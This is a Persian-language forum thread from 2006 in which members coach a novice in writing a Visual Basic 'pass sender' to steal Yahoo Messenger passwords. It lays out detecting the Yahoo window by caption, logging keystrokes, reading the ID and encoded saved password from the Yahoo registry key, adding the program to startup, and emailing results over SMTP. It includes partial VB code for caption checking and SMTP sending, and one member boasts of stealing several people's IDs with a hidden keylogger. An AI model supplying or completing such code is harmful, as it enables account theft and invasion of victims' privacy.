PDA

نسخه کامل مشاهده نسخه کامل : چگونه مي شود با وي بي يه پس سندر ساخت؟

vorojax
06-03-2006, 16:32
چگونه مي شود با وي بي يه پس سندر ساخت؟

Mostafa1024
07-03-2006, 18:44
منظورت از پس سندر چيه ؟ ميخواي يه برنامه مثل Magic PS بنويسي ؟

Payman_62
08-03-2006, 16:56
آره ديگه.
كار سختي نيست يكي از بچه ها نوشته بود. بايد چك كني ببيني پنجره كه فوكوس روشه ياهو هست يا نه.اگه ياهو بود هر كليدي كه فشرده شد رو ثبت كني و بفرستي.

vorojax
09-03-2006, 19:39
چه ميشه با وي بي يه پس سندر يا برنامه هك ساخت

vorojax
09-03-2006, 19:42
اگه كسي مسدونه چه جوري ميشه پس يندر ساخت يا برنا مه هك بگه ازش يه دنيا تشكر مي كنم.
چون خيلي به اين نياز دارم.

vorojax
09-03-2006, 19:56
اقا تو قبليا دوتا كلمه رو اشتباه نوشتم شرمنده.منظورم از چه اولي چه جوريه و منظورم از ميسدونه ميدونس به بزرگي خودتون ببخشيد.

vorojax
12-03-2006, 22:20
اقا پيمان قربون دستت يه كم بيشتر توضيح مي دي دمت گرم

vorojax
12-03-2006, 22:21
چجوري مي تونم يه كاري كنم كه فوكوس رويه ياهورو كنترل كنه ؟

Payman_62
12-03-2006, 23:50
بايد يه تايمر بذاري هندل هر پنجره اي كه فوكوس روشه رو بهت بده. بعد گرفتن هندل caption پنجره رو بايد چك كني ببيني با caption ياهو مسنجر يكي هست يا نه. اگه بود هر كليدي كه فشرده شد ثبت كن و بفرست.

shamsoft
13-03-2006, 09:01
بقيه امكانات هم با رجيستري حله

vorojax
13-03-2006, 14:24
من مي فهمم شما چي ميگين اما بلد نيستم اگه ميشه بگو چه جوري ميشه يه برنامرو كنترل كرد(اگه ميتوني يه سورس مثال بهم بده) دستت درد نكنه

Payman_62
13-03-2006, 16:29
GetForegroundWindow هندل پنجره داراي فوكوس رو بهت ميده.
از GetWindowTextLength و GetWindowText هم ميتوني براي به دست آوردن caption اون پنجره كمك بگيري.

Mostafa1024
14-03-2006, 15:33
البته راهي كه آق پيمان ميگن راه خوبيه ولي قطعا magic ps از اين روش استفاده نميكنه . يه چيزه ديگه هم هست . گرفتن caption يه پنجره هميشه راه خوبي نيست . چون ممكنه يه فولدر به همون اسم باز باشه . اون وقت برنامه اونو با ياهو مسنجر اشتباه ميگيره

vorojax
14-03-2006, 19:25
پس اقا مصتفي بايد چيكار كنم كمكم مي كنين

Payman_62
15-03-2006, 02:36
البته راهي كه آق پيمان ميگن راه خوبيه ولي قطعا magic ps از اين روش استفاده نميكنه . يه چيزه ديگه هم هست . گرفتن caption يه پنجره هميشه راه خوبي نيست . چون ممكنه يه فولدر به همون اسم باز باشه . اون وقت برنامه اونو با ياهو مسنجر اشتباه ميگيره
مجيك پس از اطلاعات سيو شده در رجيستري استفاده ميكنه و اونارو decode ميكنه و ميفرسته.
گرفتن caption هم بدك نيست. اگر هم فولدري باشه مشكلي پيش نمياد. چون طرف چيزي تايپ نميكنه كه فرستاده بشه. حالا اگرم پنجره اي اشتباه گرفته بشه و اطلاعاتي به اشتباه فرستاده بشه ميشه فهميد كه اين اطلاعات آيدي پسورد نيست و اطلاعات اشتباه است.

vorojax
16-03-2006, 19:50
اقا پيمان راهي وجود نداره كه پنجره رو اشتباه نگيره چون ممكنه طرف تو اون پنجره كه اشتباه گرفته چيزاي زيادي تايپ كنه و بعد مشكل ايجاد شده

vorojax
16-03-2006, 19:54
راستي اگه اين كارو كنم رو همه ورژنهايه ياهو جواب مي ده

Payman_62
16-03-2006, 20:57
احتمالش كمه اشتباه بگيره. چون كمتر پنجره اي داراي caption مثل ياهو هست. ولي ميتوني از كلك رشتي استفاده كني.
مثلا چك كني ببيني ياهو تو پروسس ليست هست يا نه البته روش خوبي نيست. چون اكثرل ياهو تو استارت آپه و با بالا اومدن وين اجرا ميشه.
ولي حتي اگه اطلاعات زياديم بياد كه بعيده مهم نيست. شما خيلي راحت پاكشون ميكني.
برا جواب دادن رو همه ورژن ها بايد caption ورژن هاي مختلف رو چك كني. مثلا 6 و 7 با هم فرق دارن. ولي كار ساده ايه.

vorojax
19-03-2006, 09:19
اقا پيمان من تصميم گرفتم از اول مرحله به مرحله به كمك شما پيش برم ما براي اينكه پس سندر بسازيم بايد ايدي رو بدست بياريم اونم از ريجستري الان من اگه بخوام مقدار وال اينو HKEY_CURRENT_USER\Software\Yahoo\Pager\Yahoo! User ID بدستبيارم بايد چه كدي بنويسم ؟

Payman_62
19-03-2006, 16:48
براي خواندن value ميتوني با RegOpenKeyExA كليد مربوطه رو باز كني و با RegEnumValueA دنبال value مورد نظر بگردي تا مقدارشو پيدا كني. البته احتمالا راه ساده تري هم هست. ولي احتياج به خواندن ID از رجيستري نيست. چون keylogger آيدي رو هم همراه پسورد ميفرسته. شما وقتي پنجره مسنجر رو پيدا كني هر كليدي فشرده شه ميفرستي كه آيدي هم جزشه.
ولي يه مشكلي كه هست اينه كه شايد طرف save password زده باشه. در اين صورت چيزي تايپ نميكنه و براي ما هم چيزي ميل نميشه. در اين صورت شما 2 كار ميتوني بكني. يا به آدرس HKEY_CURRENT_USER\Software\yahoo\Pager بري و مقدار اين EOptions string كه يه value هست رو بخوني و مقدارش رو decode كني تا پسورد رو به دست بياري. كاري كه مجيك ميكنه. آيدي رو هم كه خودت ميدوني از كجا به دست بياري.
ولي decode كردن پسورد يه مقدار مشكله. پس بهتره از كلك رشتي استفاده كني. حالا من نميگم چه كار ميشه كرد. خودت بگو ببينم براي فرار از اين بن بست چي به ذهنت ميرسه.

vorojax
20-03-2006, 21:13
اول بگم كلك رشتي اينه كه يه كاري مي كني طرف پسش نتونه سيو كنه دومن واسه ريجستري يه مثال بزن واسه پيدا كردن پنجره ام يه مثال بزن(يني كدشو برام بنويس)
عيدتم مبارك

vorojax
20-03-2006, 21:20
اقا پيمان من يه وي بي تازه كارم(البته نه خيلي يه بازي با وي بي ساختم) كار بار ريجيستري و گرفتن پنجره يه برنامه رو با يه مثال برام توضيح بده.دمت گرم.

Payman_62
20-03-2006, 21:33
منم مثل خودتم عزيز.
كلك رشتي رو درست گفتي ولي نگفتي چه طور اين كارو بايد كرد.
الانم حدود يه ربع مونده به عيد. فكر نكنم هيچ كي اين موقع آن شه. من برم كارامو بكنم بعدا در خدمتم.

vorojax
20-03-2006, 21:47
كار با ري جستري رو چي ياد مي دي دمت گرم.

سال نو شما پيمان جان مبارک

سالی پر از موفقیت و شادکامی را يرايت آرزومندم . موفق و پیروز و سربلند باشی.

Payman_62
21-03-2006, 01:33
ببين در مورد كار با رجيستري و گرفتن هندل پنجره داراي فوكوس كه صحبت كرده بوديم. گفتم كه از چه Api هايي ميتوني استفاده كني. ديگه چيزي نمونده بگم.
عيد شمام مبارك. عيد بر تمام ايرانيان ايران زمين مبارك باد.

vorojax
21-03-2006, 06:21
يزره بيشتر توضيح نداده بودي يه مثال بزن ياد بگيرم.

Payman_62
21-03-2006, 17:51
چرا از Msdn كمك نميگيري. توضيح اين توابع خيلي وقت گيره.

vorojax
21-03-2006, 18:01
اخه msdn ندارم

sherwood
23-03-2006, 22:46
با سلام
البته اقايون اساتيد همه دزست عرض كردند ولي تو همه يك مشكلي بود
استفاده از رجيستري اشتباه چون من خودم همين برنامه را با كار با رجيستري نوشتم ولي هر انتي ويروسي نصب باشه گير ميده
واسه همين همونو بدون كار با رجيستري نوشتم كه عالي هم كار ميكنه حالا اگه تونستم اپلودش ميكنم

Payman_62
23-03-2006, 23:46
ما كه با رجيستري كاري نداريم. چيزي توش ثبت نميكنيم. فقط ازش اطلاعات ميخونيم. آنتي كه به خوندن اطلاعات مشكلي نداره.

sherwood
24-03-2006, 14:19
حالا شما ازمايش كن من كه حرفي نزدم وقتي ميشه بدون رجيستري راحت نوشت چرا كار خودمونو سخت كنيم
راستي يه سايت خوب واسه اپلود سراغ داري بگو ممنون فقط سايتش درد سر دار نباشه مرسي

vorojax
24-03-2006, 16:44
سايت خوب وايه up مي خاي برو اينجا [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما يه مقاله توپ براي يادگيري ريجستري سراق نداري

Payman_62
24-03-2006, 16:57
مساله اينه كه ما مجبوريم با رجيستري در ارتباط باشيم اگه طرف سيو پسورد زده باشه مجبوريم به كمك رجيستري سيو پسورد رو برداريم. من قبلا برنامه نوشتم كه با رجيستري در ارتباط بوده ولي آنتي با برنامم كنار ميومد.
سايت براي آپلود
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload ax
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload

vorojax
24-03-2006, 17:31
پيمان جان شما كه ريجستري ياد ندادي خودم يه مقاله دربارش پيدا كردم لا اقل راهنماييم كن
لينك مقاله رو ميزارم اگه خاستي بگير [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
من ازت يه سوال داشتم اونم اينه كه يسري كد تو اين مقاله هست بايد تو ما‍ ژول بنويسم اره؟

Payman_62
24-03-2006, 18:33
حالا يا ماژول يا تو فرمت. اگه بخواي تو همه فرمات ازش استفاده كني بذار تو ماژول ولي اگه يه فقط يه فرم داري ميتوني بذاري تو همون يه فرم.
مقاله خيلي خوبيه بخوني كارت را ميفته.
رو RegOpenKeyExA كليد رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني.

sherwood
24-03-2006, 21:44
خوب حالا فرض پسورد رو گرفتي با رجيستري يا بي رجيستري(نظر من بي رجيستريه) چطور ميخواي از تو كامپيوتر طرف واسه خودت سند كني

Payman_62
25-03-2006, 03:09
به كمك Smtp

vorojax
25-03-2006, 06:14
حالا يا ماژول يا تو فرمت. اگه بخواي تو همه فرمات ازش استفاده كني بذار تو ماژول ولي اگه يه فقط يه فرم داري ميتوني بذاري تو همون يه فرم.
مقاله خيلي خوبيه بخوني كارت را ميفته.
رو RegOpenKeyExA كليد رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني.
ببين اقا پيمان اينجوري من هيچي نميفهمم بزا مرحله به مرحله
اول ازت مي پرسم بايد كدوم كدارو حتما تو فرم بنويسم تا كار را بيفته و بتونم با ريجستري توسط فرمانهايي كه گفته كار كنم؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟

vorojax
25-03-2006, 06:22
خوب حالا فرض پسورد رو گرفتي با رجيستري يا بي رجيستري(نظر من بي رجيستريه) چطور ميخواي از تو كامپيوتر طرف واسه خودت سند كني
ببين داداش من كار با ريجستري و ماژولو درست حسابي ياد بگيرم بقيش حله
تازه يسري كد دارم فكر كنم واسه ميل زدنه ميزارم ببين درسته

Dim Counter As Integer

Private Sub Command1_Click()

If txtFrom.Text <> "" And txtRcpt.Text <> "" And txtSubject.Text <> "" And txtBody.Text <> "" Then
wskEmail.Connect "mail.hotmail.com", 25
Timer1.Enabled = True
End If

End Sub

Private Sub Command2_Click()

Timer1.Enabled = False
wskEmail.Close

End Sub

Private Sub Form_Load()

Dim MyIP As String

MyIP = wskEmail.LocalHostName & "'s " & "IP address is " & wskEmail.LocalIP
Label1.Caption = MyIP

End Sub

Private Sub menuExit_Click()

wskEmail.Close
End

End Sub

Private Sub Timer1_Timer()

On Error Resume Next

Counter = Counter + 1

If Counter = 1 Then
wskEmail.SendData "helo" & vbCrLf
ElseIf Counter = 2 Then
wskEmail.SendData "mail from: " & txtFrom.Text & vbCrLf
ElseIf Counter = 3 Then
wskEmail.SendData "rcpt to: " & txtRcpt.Text & vbCrLf
ElseIf Counter = 4 Then
wskEmail.SendData "data" & vbCrLf
ElseIf Counter = 5 Then
wskEmail.SendData "subject: " & txtSubject.Text & vbCrLf
ElseIf Counter = 6 Then
wskEmail.SendData vbCrLf
ElseIf Counter = 7 Then
wskEmail.SendData txtBody.Text & vbCrLf
ElseIf Counter = 8 Then
wskEmail.SendData "." & vbCrLf
ElseIf Counter = 9 Then
wskEmail.SendData "quit" & vbCrLf
Timer1.Enabled = False
End If

End Sub

Private Sub wskEmail_DataArrival(ByVal bytesTotal As Long)

Dim Incomming As String

wskEmail.GetData Incomming
Text1.Text = Incomming & vbCrLf & Text1.Text

End Sub

Payman_62
25-03-2006, 13:26
گفتم كه با RegOpenKeyExA كليدي كه Value مورد نظر توش هست رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني. اون كليد كه بايد باز شه HKEY_CURRENT_USER\Software\yahoo\Pager هست و value كه بايد تو اين كليد باز شده سرچ شه ميتونه مثلا Yahoo! User ID باشه. بايد ببيني با توجه به كلك رشتي كه ميخواي بزني رو كدوم value ها بايد كار كني. حالا ببين تو اون فايل pdf كدوم ثابت ها و تعاريف مربوط به اين دو تا API ميشن و اونارو كپي كن.
حالا فعلا با همين 2 API رجيستري كار داريم. ولي در ادامه كار ممكنه API هاي ديگر هم نياز شن. مثل RegCreateKeyExA براي قرار دادن برنامت در استارت آپ كه اونم تو فايل pdf كه گذاشتي توضيح داده شده.
راستي نگفتي چه جوري ميخواي سيو پسورد رو بر ميداري.

Payman_62
25-03-2006, 14:04
الآن فايل pdf رو يه نگاه كردم و ديدم در مورد RegEnumValueA توضيحي نداده. در موردش يه توضيح مختصر ميدم. اين API براي سرچ يه Value در يك كليد باز شده هست. اين تعريف تابع
Public Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Byte, lpcbData As Long) As Long
اول با RegOpenKeyExA كليد رو باز ميكني و به كمك يه حلقه Value مورد نظرت رو سرچ ميكني.
البته ممكنه روش ساده تري هم باشه ولي من هميشه با اين API كار كردم و بهش عادت كردم.

sherwood
25-03-2006, 14:23
اين كد رو كه ميزارم يك key logger هست كه با گذاشتن يك if ميشه راحت كاري كرد كه فقط يوزر پسورد ياهو رو بگيره و تو يك فايل كه خود برنامه توشه سيو كنه و البته در process هم مخفيه با رجيستري هم كار نميكنه من خودم با همين كد اي دي چند نفر رو زدم
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
راستي بهتره كه فايل رو اول exe كني بعد باهاش كار كني

vorojax
25-03-2006, 16:41
گفتم كه با RegOpenKeyExA كليدي كه Value مورد نظر توش هست رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني. اون كليد كه بايد باز شه HKEY_CURRENT_USER\Software\yahoo\Pager هست و value كه بايد تو اين كليد باز شده سرچ شه ميتونه مثلا Yahoo! User ID باشه. بايد ببيني با توجه به كلك رشتي كه ميخواي بزني رو كدوم value ها بايد كار كني. حالا ببين تو اون فايل pdf كدوم ثابت ها و تعاريف مربوط به اين دو تا API ميشن و اونارو كپي كن.
حالا فعلا با همين 2 API رجيستري كار داريم. ولي در ادامه كار ممكنه API هاي ديگر هم نياز شن. مثل RegCreateKeyExA براي قرار دادن برنامت در استارت آپ كه اونم تو فايل pdf كه گذاشتي توضيح داده شده.
راستي نگفتي چه جوري ميخواي سيو پسورد رو بر ميداري.
ببين اقا پيمان يه مثال بزن كار ما رابيوفته تو يه بگو از تو اون فايل pdf كه گزاشتم كدوم كدا حتما بايد تو فورم باشه
كه من اونا رو بنويسم بعد با تابع regOpenKeyExa اونو باز كنم

مثال يادت نره دمت گرم منتظرتم

vorojax
26-03-2006, 11:49
اقا چيشد من به يادگيري ريجستري نياز مبرم دارم اگه كمك نميكني اقا پيمان يه تايپيك بزنم بچه هاي ديگه ياد بدن.

sherwood
26-03-2006, 13:51
اين هم يه كد با رجيستري كه فقط پسورد ياهو رو ميگيره اگه اون كد خودت رو هم تهش اضافه كني برات سند هم ميكنه
فقط يه چيزي:
Private Sub Timer2_Timer()
returnvalue = GetCaption(GetForegroundWindow)
If returnvalue = "Sign In" Then
Timer1.Enabled = True
End If
If returnvalue = "Yahoo! Messenger" Or returnvalue = "Yahoo! Messenger - Invisible" And Text1 <> "" Then تو اين قسمت بايد caption جديد Yahoo! messenger With Voice Or Yahرو وارد كني
Call check
End If
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
End Sub

Payman_62
26-03-2006, 15:23
اينا براي RegOpenKeyExA

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اين براي RegEnumValueA

hKey هندل كليدي كه با RegOpenKeyExA بازش كردي.
dwIndex ايندكس value ها.
lpValueName اسم value
lpcbValueName طول رشته value
lpReserved صفر قرار بده
lpType صفر قرار بده
lpData مقدار value
lpcbData طول رشته مقدار value

اين براي RegCloseKey

اينم يه كد براي سرچ تو يه كليد

vorojax
26-03-2006, 16:05
اقا پيمان دمت گرم برم ببينم چيزي مي فهمم

vorojax
06-04-2006, 08:58
اقا پيمان من اين كدا رو نوشتم تا امتحاني يه مقدار valu بيارم تو يه تكس اما خطا داشت ميشه بگي مشكلش كجاست؟
Const READ_CONTROL = &H20000
Const KEY_QUERY_VALUE = &H1
Const KEY_SET_VALUE = &H2
Const KEY_CREATE_SUB_KEY = &H4
Const KEY_ENUMERATE_SUB_KEYS = &H8
Const KEY_NOTIFY = &H10
Const KEY_CREATE_LINK = &H20
Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL

Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_USERS = &H80000003
Const HKEY_PERFORMANCE_DATA = &H80000004
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long

Private Sub Command1_Click()
Text1 = RegOpenKeyExA("HKEY_CURRENT_CONFIG\Softwar\Fonts\FONTS.FON")

End Sub

Payman_62
06-04-2006, 21:31
اشكالات:
1- آرگومان هاي تابع رو درست ست نكردي. شما به تعريف RegOpenKeyExA نگاه كن.

بايد براي همه اين آرگومان ها مقداري به تابع بفرستي. اين تابع 5 تا پارامتر داره.
hKey : مشخص ميكني سرشاخه مسيرت كجاست. از اين ثابت ها استفاده كن.

lpSubKey : مسير كليدت رو مينويسي.
ulOptions : مقدار 0 قرار بده.
samDesired : سطح دسترسي رو مشخص كن. از اين ثابت ها استفاده كن.

phkResult : هندل كليدي كه آدرسشو دادي و بازش كردي براي اينكه روش كار انجام بدي.

2-شما نميتوني RegOpenKeyExA رو مساوي تكس باكس قرار بدي. مثلا نتيجه اين كد

ميتونه 0 يا 2 يا ... باشه. اگه 0 باشه يعني كار با موفقيت انجام شده. ولي اگر عدد ديگري باشه نشان دهنده شماره خطاست.

3-RegOpenKeyExA فقط يه هندل بهت ميده تا رو كليد مورد نظر كار كني. و اگه ميخواي مقداري رو از داخل آن كليد بخوني و تو تكس باكس بريزي بايد از توابع ديگه مثل RegEnumValueA كمك بگيري.

vorojax
07-04-2006, 09:41
خاب قربون دستت يه كد اينجا بنويس كه اينو Software\yahoo\Pager بريزه تو يه تكس من ديگه بقيشو مي فهمم

Payman_62
07-04-2006, 14:54
ببينم كدوم قسمت اين پس سندر رو خودت نوشتي. تو كه همش داري به من ميگي اينجاشو بنويس بقيشو خودم ميفهمم. پس كي ميخواي بفهمي. ميخواي برنامه رو بنويسم بذارم اينجا برات.
من راهنمايي هاي لازم رو كردم. حتي بيشتر از حد لازم كه هر كسي ميفهمه. يه زحمتي هم به خودت بده و كمي تلاش كن. اگه همه قسمت هارو من آماده بذارم در اختيارت چيزي ياد نميگيري. سعي خودتو بكن اگه به مشكل برخوردي من در خدمتم.

vorojax
09-04-2006, 08:17
بابا مرد مومن من كار با ريجستري بلد نيستم يا مثلا مي تونم با ريجستري يه كاري كنم كه پسو سيو نكنه من گفتم اون كدا بنويسكه كار با ريجستري ياد بگيرم يا يه مثال زده باش و گر نه من يه كاري كردم كه پس سندر يه پرت ياز كنه كه بهش وصل شيم (البته فقط همين كارو كردم :biggrin: )
من در كل خيلي دوست دارم كار با ريجستري رو ياد بگيرم هر چي گفتين نوشتم ولي باز ارور داد مثلا تو مقاله نوشته بود اين كدا رو بنويس يه test ميسازه اما باز ارور ميده
Const boxmode = vbMsgBoxRtlReading + vbMsgBoxRight
Dim lngreturn As Long
Dim phkresult As Long

Dim lpClass1 As Class1
Dim lpclass As String
ingReturn = RegCreateKeyEx(HKEY_CURRENT_USER, "TEST", 0&, _
lpclass, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, _
lpsecurityattributes, phkresult, 0&)
If lngreturn <> ERROR_SUCCESS Then
gAPIDisplayError lngreturn
Exit Sub
Else
MsgBox "IVAL", boxmode, "1"

Payman_62
09-04-2006, 13:28
گفتي يه مثال در مورد سرچ كردن بزن. كدشو كامل برات گذاشتم. من تو كدي كه گذاشته بودم از regOpenKeyExa هم استفاده كرده بودم و شما خيلي راحت ميتونستي حداقل كار كردن با اين تابع رو ياد بگيري. ولي شما اومدي نوشتي
Text1 = RegOpenKeyExA("HKEY_CURRENT_CONFIG\Softwar\Fonts\FONTS.FON")
خوب اين يعني يه نگاه ساده هم به كد من ننداختي و فقط كپي كرديش تو فرمت.
راستي منظورت از اينكه پورت باز كردي كه بهش وصل شيم چيه. مگه ميخواي تروجان Server Client بنويسي. پس سندر كه ديگه نياز به وصل شدن نداره. فقط بايد برنامه اي بنويسي كه اطلاعاتو برات ميل كنه.

vorojax
10-04-2006, 08:50
اول اينكه مي خوام چيزي كه ميسازسم تمام امكاناتو داشتو باشه بابا هرچي كد مي نويسم ارور مي ده به خدا (ديروز5 ساعت ور رفتم اما نتيجه نگرفتم)

يه سوال؟اول بايد حتما regopenkeyexA بازش كنم تا بشه تغييرات تو ريجستري انجام داد.(من انقدر با كدات ور رفتم تا بلخره يه كاري با ريجستري كنم به خدا خسته شدم)
ولي بازم دستت درد نكنه كه كمكم كردي منم جبران مي كنم(اگه ريجستري ياد گرفتم يه مقاله بهت مي دم با نام ساخت تروجان در وي بي كه حيلي خيلي توپه فارسيم هست ولي بديش اينه كه پس سندر نيست)

Payman_62
10-04-2006, 18:53
اول اينكه مي خوام چيزي كه ميسازسم تمام امكاناتو داشتو باشه
پس پروژت خيلي پيچيده تر از يه پس سندر سادست. اگه اين جوره پيشنهاد ميكنم به جاي پس سندر ياهو كي لاگر تو برنامت قرار بده تا كامل تر بشه.

يه سوال؟اول بايد حتما regopenkeyexA بازش كنم تا بشه تغييرات تو ريجستري انجام داد.
بايد يه هندل از كليدي كه ميخواي روش كار كني داشته باشي. حالا اگه كليدو خودت با RegCreateKeyExA ساخته باشي پارامتر يكي مونده به آخر اين تابع يعني phkResult هندل اون كليديه كه ساختي و ميتوني روش كار كني. اگرم كليدو خودت نساخته باشي بايد با regOpenKeyExa بازش كني تا يه هندل ازش به دست بياري و بتوني روش كار كني. پارامتر آخر در اين تابع يعني phkResult هندل كليديه كه بازش كردي.
اين كد كليد HKEY_CURRENT_USER\Software\yahoo\Pager رو برات باز ميكنه و hKey هندل اين كليده كه ميتوني ازش تو توابع ديگت براي اعمال تغييرات استفاده كني.

مثلا اين كد تو اون مسير يه Value به اسم Test و با مقدار Payman ايجاد ميكنه و مقدار Valueي Yahoo! User ID رو به Vorojax تغيير ميده.

دقت كن كه از هندل چگونه استفاده شده. پارامترها چگونه مقداردهي شدند. اينارو ياد بگيري ديگه مشكلي پيش نمياد.

بابا هرچي كد مي نويسم ارور مي ده به خدا (ديروز5 ساعت ور رفتم اما نتيجه نگرفتم)
(من انقدر با كدات ور رفتم تا بلخره يه كاري با ريجستري كنم به خدا خسته شدم)
من با مراجعه به MSDN و نوشتن برنامه هاي آزمايشي كار با رجيستري رو ياد گرفتم. كسي يادم نداد. پس فكر نكن پيچيدست. خيلي ساده تر از اونيه كه فكرِشو ميكني و خيلي راحت ميتوني ياد بگيري. فقط اصولي كار كن. ببين تو اون فايل هاي PDF چه توضيحاتي داده و من تو كدهايي كه گذاشتم از چه روشي استفاده كردم تا ياد بگيري. همين جور شانسي نيا و RegOpenKeyExA رو برابر تكس باكس قرار نده.

ولي بازم دستت درد نكنه كه كمكم كردي منم جبران مي كنم(اگه ريجستري ياد گرفتم يه مقاله بهت مي دم با نام ساخت تروجان در وي بي كه حيلي خيلي توپه فارسيم هست ولي بديش اينه كه پس سندر نيست)
خواهش ميكنم ولي من تا به حال بدون هيچ چشم داشتو انتظاري اطلاعاتم رو در اختيارت گذاشتم. از اين به بعد هم همين طوره. ولي شما چرا براي ياد دادن شرط ميذاري.

vorojax
10-04-2006, 19:03
عزيزم شرط چيه تو جون بخاه (اخه ديدم قاطي كردي گفتم شايد ديگه ياد ندي البته شرمنده نبايد چنين فكري مي كردم)
مقاله رو فردا اپ مي كنم لينكشم به صورت خصوصي برات مي فرستم چون فكر نكم صاحب اون مقاله دوست داشته باشه مقالشو واسه همه بزارم.
(امروز نميتونم واست بزارم چون الان بايد برم از كمكاتم يه دنيا ممنون)

vorojax
11-04-2006, 08:30
برات لينكشو فرستادم از بابت كداتم ممنومن. تو زبانت خيلي قويه كه تونستي اينارو با msdn ياد بگيري اره؟؟

Payman_62
11-04-2006, 23:21
دستت درد نكنه. اين مقاله بيشتر به توضيح Winsock پرداخته تا فوت و فن تروجان نويسي. يه مقاله مشابه همين مقاله دارم با نام winsock and vb.

vorojax
12-04-2006, 11:06
اگه از مقاله واسه من بهتره برامون بزار دمت گرم.

Payman_62
12-04-2006, 11:21
مثله همونه . اينجا هم كه نميشه فايل آپلود كرد.

vorojax
13-04-2006, 21:05
اقا قربون دستت يه مقاله چيزي نداري كه از توش بفهمم چه جوري ميشه با يه برنماه ديگه ارتباط برقرار كرد(براي پس ياهو)

Payman_62
13-04-2006, 21:53
براي ارتباط با برنامه ديگه ميتوني از كامپوننت Winsock استفاده كني. امكانات خوبي بهت ميده. فقط يادت باشه برنامه دومم بايد اين كامپوننت رو داشته باشه و پورتشم به برنامت بخوره. نميتوني بياييو مثلا به winamp وصل شي. در واقع برنامه دوم بايد آماده برقراري ارتباط باشه.

vorojax
14-04-2006, 20:38
نه منظورمو نگرفتي براي گرفتن پس ياهو گفتيد بايد پنجره كپشن ياهورو كنترل كنم اونو ميگم؟؟
راستي دارم يه مرورگر ميسازم تو تو اين زمينه تجربه داري يه كمك كني بهم؟

Payman_62
16-04-2006, 14:25
بازم منظورتو نفهميدم.
در رابطه با مرورگر هم تجربه اي ندارم.

vorojax
16-04-2006, 21:27
بابا يادته گته بهم گفتي پس ياهو رو چه جوري بگيرم؟؟

Payman_62
16-04-2006, 22:52
تو كه تايپ ميكني به جاي اينكه بگي يادته مشكلتو شرح بده. واضح كه بشه فهميد.

vorojax
17-04-2006, 09:13
پس ياهو رو از نظر تو چگونه بگيرم

Payman_62
17-04-2006, 14:28
در مورد اين موضوع كه قبلا كلي بحث كرديم. صفحه هاي قبلي رو بخون.

vorojax
18-04-2006, 16:04
خاب خوتدم ولي چيزي نفهمدم در رابطه با اون مقاله اي چيزي در دست رس نداري
راستي يه سري كدم مي خام كه ميل بزنه

Payman_62
18-04-2006, 23:33
جون vorojax سوالتو واضح بيان كن. خاب خوندم ولي نفهميدم يعني چي. خوب بگو در مورد فلان API توضيح بده. من كه الآن نميدونم كجاي كارت گيره.
واسه ميل زدنم تا دلت بخواد كد هست. يه سرچ كني خيلي راحت گير مياري.

vorojax
19-04-2006, 09:33
GetForegroundWindow هندل پنجره داراي فوكوس رو بهت ميده.
از GetWindowTextLength و GetWindowText هم ميتوني براي به دست آوردن caption اون پنجره كمك بگيري.

اينو برام توضيح كامل بده البته اگه زحمتي نيست

Payman_62
19-04-2006, 12:47
GetForegroundWindow كه خيلي سادست. پارامتري نداره. بگو hWnd=GetForegroundWindow بعد هندل پنجره داراي فوكوس ريخته ميشه تو hWnd . بذار تو يه تايمر كه هر پنجره اي كه فوكوس گرفت هندلشو برگردونه.
GetWindowTextLength طول كپشن رو برميگردونه. كه ازش تو يكي از پارامترهاي GetWindowText استفاده ميشه.
GetWindowText هم كه خود كپشن رو ميده.
اينم يه مثال كه هندل به همراه كپشن همه پنجره هارويي كه فوكوس بگيرن رو ميريزه تو تكس باكس.

vorojax
20-04-2006, 06:25
قربون مرامت پيمان جون

Payman_62
20-04-2006, 22:46
قابل نداشت.

vorojax
22-04-2006, 06:35
اینجوری که هم یوز گرفته میشه هم پس با هم جدا جداش نمیشه کرد

vorojax
22-04-2006, 09:40
اینم یادم رفت چه جوری تشخیص بدم یارو کلید sing in زده و login شده

Payman_62
22-04-2006, 20:08
اینجوری که هم یوز گرفته میشه هم پس با هم جدا جداش نمیشه کرد
كاري نداره كه خيلي كارا ميتوني بكني. مثلا ميتوني از مسير HKEY_CURRENT_USER\Software\Yahoo\Pager و value به نام Yahoo! User ID نام يوزر طرف رو بخوني و از پسوردش جدا كني.

اینم یادم رفت چه جوری تشخیص بدم یارو کلید sing in زده و login شده
